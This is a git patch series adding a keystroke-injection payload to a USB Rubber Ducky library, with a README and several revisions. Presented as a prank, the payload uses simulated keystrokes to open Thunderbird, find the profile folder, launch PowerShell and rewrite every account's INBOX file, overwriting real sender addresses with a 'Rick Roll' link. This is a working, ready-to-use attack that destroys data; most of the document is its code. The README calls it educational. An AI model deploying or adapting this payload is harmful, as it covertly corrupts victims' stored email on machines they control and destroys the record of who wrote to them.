From ef82f851a2ca51389e32634755e321aee15227b5 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 09:09:06 +0200 Subject: [PATCH 1/9] Prank In The Middle - Thunderbird The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists. --- .../Prank_In_The_Middle_Thunderbird/README.md | 95 +++++++++++++++ .../payload.txt | 112 ++++++++++++++++++ 2 files changed, 207 insertions(+) create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md new file mode 100644 index 000000000..a569d26ad --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md @@ -0,0 +1,95 @@ +# Prank In The Middle - Thunderbird + +The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. + +**Category**: Prank + +**Plug-And-Play** ^^ + +## Index + +- [Description](#description) +- [Requirements](#requirements) +- [How the Program Works](#how-the-program-works) +- [Code Details](#code-details) + - [System Detection && Short Start DELAY](#system-detection--short-start-delay) + - [Navigating in Thunderbird](#navigating-in-thunderbird) + - [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation) + - [The Regex](#the-regex) +- [Notes](#notes) +- [Credits](#credits) + +## Description + +This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `Rick.Roll@tinyurl.com/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era già stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`. + +![](https://i.ibb.co/VJjfbkJ/1.png) + +## Requirements + +- A Windows system with Thunderbird installed. +- Access to PowerShell. +- Permissions to run code in Powershell + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## How the Program Works + +1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this. +2. **Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings. +3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard. +4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile. +5. **Email Manipulation:** Uses PowerShell to: + - Find all `INBOX` folders within `ImapMail`. + - Read the contents of the emails in `INBOX`. + - Replace the sender addresses with `Rick Roll `. + - Save the modified content back to the original email files. + +## Code Details + +For reasons of space, the code is not given in the documentation. However, comments can be found that broadly explain the piece of code that is executed following the comment itself. + +### The Regex + +The regex was not created from scratch but was taken from the discussion “[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. +2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. +3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt new file mode 100644 index 000000000..74bd0e33d --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -0,0 +1,112 @@ +* REM ################################################### +* REM # # +* REM # Title : Prank In The Middle - Thunderbird # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Prank # +* REM # Target : Windows 10/11 # +* REM # # +* REM ################################################### + +* REM Open Thunderbird and goto settings +QUACK WIN r +QUACK STRING thunderbird +QUACK ENTER +QUACK DELAY 1000 +QUACK REPEAT 4 TAB +QUACK ENTER +QUACK DELAY 500 +QUACK REPEAT 2 UPARROW +QUACK ENTER +QUACK DELAY 500 +QUACK REPEAT 3 UPARROW +QUACK ENTER +QUACK DELAY 500 + +* REM Goto profile directory +QUACK REPEAT 11 TAB +QUACK ENTER +QUACK DELAY 500 + +*REM Copy the directory path +QUACK REPEAT 4 TAB +QUACK DELAY 500 +QUACK SPACEBAR +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK CTRL c +QUACK DELAY 500 +QUACK ALT F4 +QUACK DELAY 500 + +* REM Open the powershell and goto the directory +QUACK WIN r +QUACK STRING powershell +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING cd +QUACK DELAY 500 +QUACK CTRL v +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 + +* REM Get the INBOX content and edit it overwriting. Then close the powershell +QUACK STRING cd ImapMail +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $directories = Get-ChildItem -Directory | Select-Object FullName +QUACK ENTER +QUACK DELAY 500 +QUACK STRING foreach ($dir in $directories) { +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Replace backslashes with slash +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $newPath = $dir.FullName -replace '\\', '/' +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Add the sub-string “/INBOX” to the end +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $newPath += "/INBOX" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Check whether the INBOX file exists +QUACK ENTER +QUACK DELAY 500 +QUACK STRING if (Test-Path $newPath) { +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Check whether the INBOX file exists +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $emails = Get-Content -Path $newPath -Raw +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Replace email sender with Rick Roll! +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # The following operation is simplified and assumes that the sender starts with “From: ...” +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # and does not contain complex MIME structures +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Write the modified content into the INBOX file. +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Set-Content -Path $newPath -Value $modifiedEmails -Force +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } +QUACK DELAY 1000 +QUACK ALT F4 \ No newline at end of file From 0317f9e286621fdeeaf8ef0ab5e6e8f252386735 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 09:15:25 +0200 Subject: [PATCH 2/9] Update payload.txt --- .../library/prank/Prank_In_The_Middle_Thunderbird/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 74bd0e33d..576de8d66 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -108,5 +108,6 @@ QUACK STRING } QUACK ENTER QUACK DELAY 500 QUACK STRING } +QUACK ENTER QUACK DELAY 1000 -QUACK ALT F4 \ No newline at end of file +QUACK ALT F4 From 9e67b9069c60bf254bec8e6f0309efd2cc5151ab Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 12:17:38 +0200 Subject: [PATCH 3/9] Removed DS3 stuff --- .../payload.txt | 26 +++++++++++++++---- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 576de8d66..79788efcb 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -16,20 +16,36 @@ QUACK DELAY 1000 QUACK REPEAT 4 TAB QUACK ENTER QUACK DELAY 500 -QUACK REPEAT 2 UPARROW +QUACK UPARROW +QUACK UPARROW QUACK ENTER QUACK DELAY 500 -QUACK REPEAT 3 UPARROW +QUACK UPARROW +QUACK UPARROW +QUACK UPARROW QUACK ENTER QUACK DELAY 500 * REM Goto profile directory -QUACK REPEAT 11 TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB QUACK ENTER QUACK DELAY 500 -*REM Copy the directory path -QUACK REPEAT 4 TAB +* REM Copy the directory path +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB QUACK DELAY 500 QUACK SPACEBAR QUACK DELAY 500 From 02304ac5670b7b34063b3f62806cb152c3b1dae9 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 07:43:13 +0200 Subject: [PATCH 4/9] Update payload.txt --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 79788efcb..91271700f 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -9,7 +9,7 @@ * REM ################################################### * REM Open Thunderbird and goto settings -QUACK WIN r +QUACK GUI r QUACK STRING thunderbird QUACK ENTER QUACK DELAY 1000 @@ -47,7 +47,7 @@ QUACK TAB QUACK TAB QUACK TAB QUACK DELAY 500 -QUACK SPACEBAR +QUACK SPACE QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 @@ -57,7 +57,7 @@ QUACK ALT F4 QUACK DELAY 500 * REM Open the powershell and goto the directory -QUACK WIN r +QUACK GUI r QUACK STRING powershell QUACK ENTER QUACK DELAY 1500 From 46d7a77aa4fdc730c12cef1959f94a4bb1231dfc Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 10:08:33 +0200 Subject: [PATCH 5/9] [~] From " to ' --- .../Prank_In_The_Middle_Thunderbird/payload.txt | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 91271700f..655e2b38a 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -1,11 +1,11 @@ * REM ################################################### -* REM # # +* REM # # * REM # Title : Prank In The Middle - Thunderbird # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : Prank # -* REM # Target : Windows 10/11 # -* REM # # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Prank # +* REM # Target : Windows 10/11 # +* REM # # * REM ################################################### * REM Open Thunderbird and goto settings @@ -87,7 +87,7 @@ QUACK DELAY 500 QUACK STRING # Add the sub-string “/INBOX” to the end QUACK ENTER QUACK DELAY 500 -QUACK STRING $newPath += "/INBOX" +QUACK STRING $newPath += '/INBOX' QUACK ENTER QUACK DELAY 500 QUACK STRING # Check whether the INBOX file exists @@ -111,7 +111,7 @@ QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " +QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`'(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`')@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. From 62bf9d16ca888975f916bbb070ce570664a20f4a Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 10:25:16 +0200 Subject: [PATCH 6/9] [~] From " to ' --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 655e2b38a..8f3aefb1d 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -84,7 +84,7 @@ QUACK DELAY 500 QUACK STRING $newPath = $dir.FullName -replace '\\', '/' QUACK ENTER QUACK DELAY 500 -QUACK STRING # Add the sub-string “/INBOX” to the end +QUACK STRING # Add the sub-string '/INBOX' to the end QUACK ENTER QUACK DELAY 500 QUACK STRING $newPath += '/INBOX' @@ -105,13 +105,13 @@ QUACK DELAY 500 QUACK STRING # Replace email sender with Rick Roll! QUACK ENTER QUACK DELAY 500 -QUACK STRING # The following operation is simplified and assumes that the sender starts with “From: ...” +QUACK STRING # The following operation is simplified and assumes that the sender starts with 'From: ...' QUACK ENTER QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`'(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`')@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' +QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. From 358e3ad6f95aedcec3c5976253feacca8b23cc41 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 15:52:22 +0200 Subject: [PATCH 7/9] Update payload.txt [+] ATTACKMODE HID --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 8f3aefb1d..d1aa48f62 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -2,12 +2,14 @@ * REM # # * REM # Title : Prank In The Middle - Thunderbird # * REM # Author : Aleff # -* REM # Version : 1.0 # +* REM # Version : 1.0 # * REM # Category : Prank # -* REM # Target : Windows 10/11 # +* REM # Target : Windows 10/11 # * REM # # * REM ################################################### +ATTACKMODE HID + * REM Open Thunderbird and goto settings QUACK GUI r QUACK STRING thunderbird From 6c5b186447c3ff79f6547e55b789f3b0d73b5c91 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 12:00:24 +0200 Subject: [PATCH 8/9] Update payload.txt --- .../library/prank/Prank_In_The_Middle_Thunderbird/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index d1aa48f62..b2d965d52 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -113,7 +113,7 @@ QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' +QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. From fdf3e69142f87c0e5e92aec77c9fb8894ea05931 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 11 Jun 2024 07:56:31 +0200 Subject: [PATCH 9/9] $ -> \$ --- .../payload.txt | 45 ++++++++++--------- 1 file changed, 23 insertions(+), 22 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index b2d965d52..ab2e6fd58 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -1,16 +1,17 @@ -* REM ################################################### -* REM # # -* REM # Title : Prank In The Middle - Thunderbird # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : Prank # -* REM # Target : Windows 10/11 # -* REM # # -* REM ################################################### +################################################### +# # +# Title : Prank In The Middle - Thunderbird # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11 # +# # +################################################### ATTACKMODE HID -* REM Open Thunderbird and goto settings +# Open Thunderbird and goto settings +QUACK DELAY 1500 QUACK GUI r QUACK STRING thunderbird QUACK ENTER @@ -28,7 +29,7 @@ QUACK UPARROW QUACK ENTER QUACK DELAY 500 -* REM Goto profile directory +# Goto profile directory QUACK TAB QUACK TAB QUACK TAB @@ -43,7 +44,7 @@ QUACK TAB QUACK ENTER QUACK DELAY 500 -* REM Copy the directory path +# Copy the directory path QUACK TAB QUACK TAB QUACK TAB @@ -58,7 +59,7 @@ QUACK DELAY 500 QUACK ALT F4 QUACK DELAY 500 -* REM Open the powershell and goto the directory +# Open the powershell and goto the directory QUACK GUI r QUACK STRING powershell QUACK ENTER @@ -70,38 +71,38 @@ QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 -* REM Get the INBOX content and edit it overwriting. Then close the powershell +# Get the INBOX content and edit it overwriting. Then close the powershell QUACK STRING cd ImapMail QUACK ENTER QUACK DELAY 500 -QUACK STRING $directories = Get-ChildItem -Directory | Select-Object FullName +QUACK STRING \$directories = Get-ChildItem -Directory | Select-Object FullName QUACK ENTER QUACK DELAY 500 -QUACK STRING foreach ($dir in $directories) { +QUACK STRING foreach (\$dir in \$directories) { QUACK ENTER QUACK DELAY 500 QUACK STRING # Replace backslashes with slash QUACK ENTER QUACK DELAY 500 -QUACK STRING $newPath = $dir.FullName -replace '\\', '/' +QUACK STRING \$newPath = \$dir.FullName -replace '\\', '/' QUACK ENTER QUACK DELAY 500 QUACK STRING # Add the sub-string '/INBOX' to the end QUACK ENTER QUACK DELAY 500 -QUACK STRING $newPath += '/INBOX' +QUACK STRING \$newPath += '/INBOX' QUACK ENTER QUACK DELAY 500 QUACK STRING # Check whether the INBOX file exists QUACK ENTER QUACK DELAY 500 -QUACK STRING if (Test-Path $newPath) { +QUACK STRING if (Test-Path \$newPath) { QUACK ENTER QUACK DELAY 500 QUACK STRING # Check whether the INBOX file exists QUACK ENTER QUACK DELAY 500 -QUACK STRING $emails = Get-Content -Path $newPath -Raw +QUACK STRING \$emails = Get-Content -Path \$newPath -Raw QUACK ENTER QUACK DELAY 500 QUACK STRING # Replace email sender with Rick Roll! @@ -113,13 +114,13 @@ QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' +QUACK STRING \$modifiedEmails = \$emails -replace 'From:\s.*\s<(?:[a-z0-9!#\$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#\$%&*+/=?^_`{|}~-]+)*|`\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. QUACK ENTER QUACK DELAY 500 -QUACK STRING Set-Content -Path $newPath -Value $modifiedEmails -Force +QUACK STRING Set-Content -Path \$newPath -Value \$modifiedEmails -Force QUACK ENTER QUACK DELAY 500 QUACK STRING }